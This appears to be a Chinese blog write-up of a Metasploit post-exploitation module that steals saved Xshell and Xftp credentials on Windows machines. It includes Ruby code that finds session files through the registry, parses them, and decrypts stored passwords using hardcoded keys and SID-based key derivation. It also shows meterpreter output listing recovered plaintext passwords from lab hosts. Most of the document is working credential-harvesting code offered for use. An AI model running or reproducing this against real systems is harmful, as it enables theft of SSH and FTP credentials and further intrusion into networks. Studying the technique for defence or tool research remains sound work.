前言

思路

找session文件

include Msf::Post::Windows::UserProfiles
profiles = grab_user_profiles
profiles.each do |user_profiles|
	next if user_profiles['SID'].nil?

parent_key_6 = "HKEY_USERS\\\\\\\\#{user_profiles['SID']}\\\\\\\\Software\\\\\\\\NetSarang\\\\\\\\Common\\\\\\\\6\\\\\\\\UserData"
parent_key_5 = "HKEY_USERS\\\\\\\\#{user_profiles['SID']}\\\\\\\\Software\\\\\\\\NetSarang\\\\\\\\Common\\\\\\\\5\\\\\\\\UserData"

net_sarang_path_6 = expand_path(registry_getvaldata(parent_key_6, 'UserDataPath'))
net_sarang_path_5 = expand_path(registry_getvaldata(parent_key_5, 'UserDataPath'))

解析session配置文件

def try_encode_file(data)
	# version 6.0 The character set of the session file will use Unicode
	# version <= 5.3 The character set of the session file will use ANSI
	if data[0].unpack('C') == [255] && data[1].unpack('C') == [254]
		data[2..-1].force_encoding('UTF-16LE').encode('UTF-8') # FFFE Unicode
	elsif data[0].unpack('C') == [254] && data[1].unpack('C') == [187] && data[2].unpack('C') == [191]
		data # EFBBBF UTF-8
	elsif data[0].unpack('C') == [254] && data[1].unpack('C') == [255]
		data[2..-1].force_encoding('UTF-16BE').encode('UTF-8') # FEFF Unicode BE
	else
		data
	end
end

# parser xsh session file
#
# @param ini [String]
# @return [version, host, port, username, password]
def parser_xsh(ini)
	version = ini['SessionInfo']['Version']
	port = ini['CONNECTION']['Port']
	host = ini['CONNECTION']['Host']
	username = ini['CONNECTION:AUTHENTICATION']['UserName']
	password = ini['CONNECTION:AUTHENTICATION']['Password'] || nil
	[version, host, port, username, password]
end

# parser xfp session file
#
# @param ini [String]
# @return [version, host, port, username, password]
def parser_xfp(ini)
	version = ini['SessionInfo']['Version']
	port = ini['Connection']['Port']
	host = ini['Connection']['Host']
	username = ini['Connection']['UserName']
	password = ini['Connection']['Password']
	[version, host, port, username, password]
end

解密密文

class NetSarangCrypto
    attr_accessor :version
    attr_accessor :username
    attr_accessor :sid
    attr_accessor :master_password
    attr_accessor :key

    # This class implements encryption and decryption of NetSarang
    #
    # @param type [String] only xshell or xftp.
    # @param version [String] Specify version of session file. e.g.:5.3
    # @param username [String] Specify username. This parameter will be used if version > 5.2.
    # @param sid [String] Specify SID. This parameter will be used if version >= 5.1.
    # @option master_password [String] Specify user's master password.
    #
    # @return [Rex::Parser::NetSarang::NetSarangCrypto] The NetSarangCrypto object
    def initialize(type, version, username, sid, master_password = nil)
        self.version = version.to_f
        self.username = username
        self.sid = sid
        self.master_password = master_password
        md5 = OpenSSL::Digest::MD5.new
        sha256 = OpenSSL::Digest::SHA256.new
        if (self.version > 0) && (self.version < 5.1)
            self.key = (type == 'xshell') ? md5.digest('!X@s#h$e%l^l&') : md5.digest('!X@s#c$e%l^l&')
        elsif (self.version >= 5.1) && (self.version <= 5.2)
            self.key = sha256.digest(self.sid)
        elsif (self.version > 5.2)
            if self.master_password.nil?
                self.key = sha256.digest(self.username + self.sid)
            else
                self.key = sha256.digest(self.master_password)
            end
        else
            raise 'Invalid argument: version'
        end
    end

    # Encrypt
    #
    # @param string [String]
    # @return [String] ciphertext
    def encrypt_string(string)
        cipher = Rex::Crypto.rc4(key, string)
        if (version < 5.1)
            return Rex::Text.encode_base64(cipher)
        else
            sha256 = OpenSSL::Digest::SHA256.new
            checksum = sha256.digest(string)
            ciphertext = cipher
            return Rex::Text.encode_base64(ciphertext + checksum)
        end
    end

    # Decrypt
    #
    # @param string [String]
    # @return [String, Boolean] plaintext, is_valid
    def decrypt_string(string)
        if (version < 5.1)
            return Rex::Crypto.rc4(key, Rex::Text.decode_base64(string))
        else
            data = Rex::Text.decode_base64(string)
            ciphertext = data[0, data.length - 0x20]
            plaintext = Rex::Crypto.rc4(key, ciphertext)
            if plaintext.is_utf8?
                return [plaintext, true]
            else
                return [nil, false]
            end
        end
    end
end

信息入库

Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------
192.168.76.1    192.168.76.132  2121/tcp (ftp)  lftpd     lftpd      Password
192.168.76.1    192.168.76.132  2121/tcp (ftp)  lftpd                Blank password
192.168.76.134  192.168.76.132  22/tcp (ssh)    kt        123456

使用方法

meterpreter > run post/windows/gather/credentials/xshell_xftp_password

[-] Unexpected Windows error 1332
UserName: C:\\\\Users\\\\Administrator\\\\Documents\\\\NetSarang
====================================================

Type         Name                           Host            Port  UserName  Plaintext  Password
----         ----                           ----            ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp                   192.168.76.1    2121  lftpd     lftpd      yhmb27u7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V5.3  新建会话 - 副本 (2).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (3).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (4).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本.xsh            192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话.xsh                   192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=

[-] Invalid MASTER_PASSWORD, Decryption failed!
UserName: C:\\\\Users\\\\Administrator\\\\Documents\\\\NetSarang Computer\\\\6
===============================================================

Type         Name              Host          Port  UserName  Plaintext  Password
----         ----              ----          ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp      192.168.76.1  2121  lftpd                sQsnGxC7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V6.0  新建会话.xsh                    22    kt

meterpreter >

meterpreter > run post/windows/gather/credentials/xshell_xftp_password MASTER_PASSWORD=123456

[-] Unexpected Windows error 1332
UserName: C:\\\\Users\\\\Administrator\\\\Documents\\\\NetSarang
====================================================

Type         Name                           Host            Port  UserName  Plaintext  Password
----         ----                           ----            ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp                   192.168.76.1    2121  lftpd     lftpd      yhmb27u7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V5.3  新建会话 - 副本 (2).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (3).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本 (4).xsh        192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话 - 副本.xsh            192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V5.3  新建会话.xsh                   192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=

UserName: C:\\\\Users\\\\Administrator\\\\Documents\\\\NetSarang Computer\\\\6
===============================================================

Type         Name              Host          Port  UserName  Plaintext  Password
----         ----              ----          ----  --------  ---------  --------
Xftp_V5.3    新建会话.xfp      192.168.76.1  2121  lftpd     lftpd      sQsnGxC7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V6.0  新建会话.xsh                    22    kt

meterpreter >

https://github.com/rapid7/metasploit-framework/pull/13525

Powered by Kali-Team